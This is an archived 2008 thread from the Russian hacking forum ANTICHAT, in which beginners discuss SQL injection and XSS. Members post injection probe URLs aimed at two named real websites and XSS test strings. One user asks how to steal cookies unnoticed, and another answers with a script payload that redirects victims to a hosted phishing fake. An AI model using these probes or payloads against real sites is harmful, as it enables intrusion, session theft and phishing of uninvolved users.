ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.03.2008, 19:27
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316
Репутация:
327
|
|
mff благодарность принимается ввиде +++++ к репе)
|
|
|
24.03.2008, 19:36
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
Я такого еще не встречал,может кто подскажет
при запросе, например:
http://www.stroyfarfor.com/catalog?c_dept_id=4&c_good_id=14+order+by+10000/*
выплевывает очень интересную ошибку
------------------------------------------------------
и такое, не первый раз встречаю
http://www.vera-tour.ru/event/show.phtml?show=`
что это может быть? |
|
|
|
24.03.2008, 19:48
|
|
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132
Репутация:
63
|
|
Здрасти.Извините я сильно новичок... .Вот нашол я в чате багу с Xss/
Как написать мне что бы куки без палева переходили на мыло или на сайт.. .И плиз можете кинуть ссылку на тему типа"Что можно сделать с багой в Xss"
|
|
|
|
24.03.2008, 19:52
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316
Репутация:
327
|
|
samarin по первой ссылке это называется те со скулей облом
по второй те вообще выдало все поля бд E_FATAL_NOSACHOBJ тут тоже не инжэкт а апросто ашибка самой базы
Последний раз редактировалось ReVOLVeR; 24.03.2008 в 19:58..
|
|
|
|
24.03.2008, 19:56
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316
Репутация:
327
|
|
Buffalon
_http://forum.antichat.ru/thread20140.html
|
|
|
|
24.03.2008, 20:06
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
2Buffalon
попробуй вот так  сделай фейк этой страницы либо ручками либо через anyfake воткни на хостинг и воткнить в xss такой :
Код:
<script type="text/javascript">window.top.location = "http://путь ктвоему фейку";</script>
что собствеено откроет в этом же окне твой фейк !ссылка на почитати выше |
|
|
|
24.03.2008, 22:03
|
|
Новичок
Регистрация: 20.09.2007
Сообщений: 17
Провел на форуме:
103803
Репутация:
2
|
|
Сообщение от o3,14um
самео простое - вводи в поля ввода такую штуку: '">xss и смотри где код вышел за пределы ковычки. ДЛя активных ксс - <>><}{)(xss()'=" - смотри в исходнике что фильтруется а что нет
то есть я это написал,он мне пишет что страница не найдена=значит что нет xss
а если он сьел,то значит я роюсь в исходнике?или это отображается как та на странице?оч хочу разобраться в xss
|
|
|
|
24.03.2008, 22:07
|
|
Новичок
Регистрация: 20.09.2007
Сообщений: 17
Провел на форуме:
103803
Репутация:
2
|
|
Сообщение от xcedz
http://ha.ckers.org/xss.html =\
здесь я был, но как понял все xss пишутся в исходнике,а что потом та?
|
|
|
|
24.03.2008, 22:14
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Скачай хотя бы видео тогда, ну или журнал например хакер почитай там какой то спец номер вроде был про xss (хотя мож ошибаюсь) =\ Да и на античате много статей ничуть не хуже чем в журналах.. вот прочитай все проанализируй.
Последний раз редактировалось xcedz; 24.03.2008 в 22:28..
|
|
|
|
24.03.2008, 22:43
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от Titop
здесь я был, но как понял все xss пишутся в исходнике,а что потом та?
А тут уже начинается самое сложное. Надо немного подумать
__________________
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
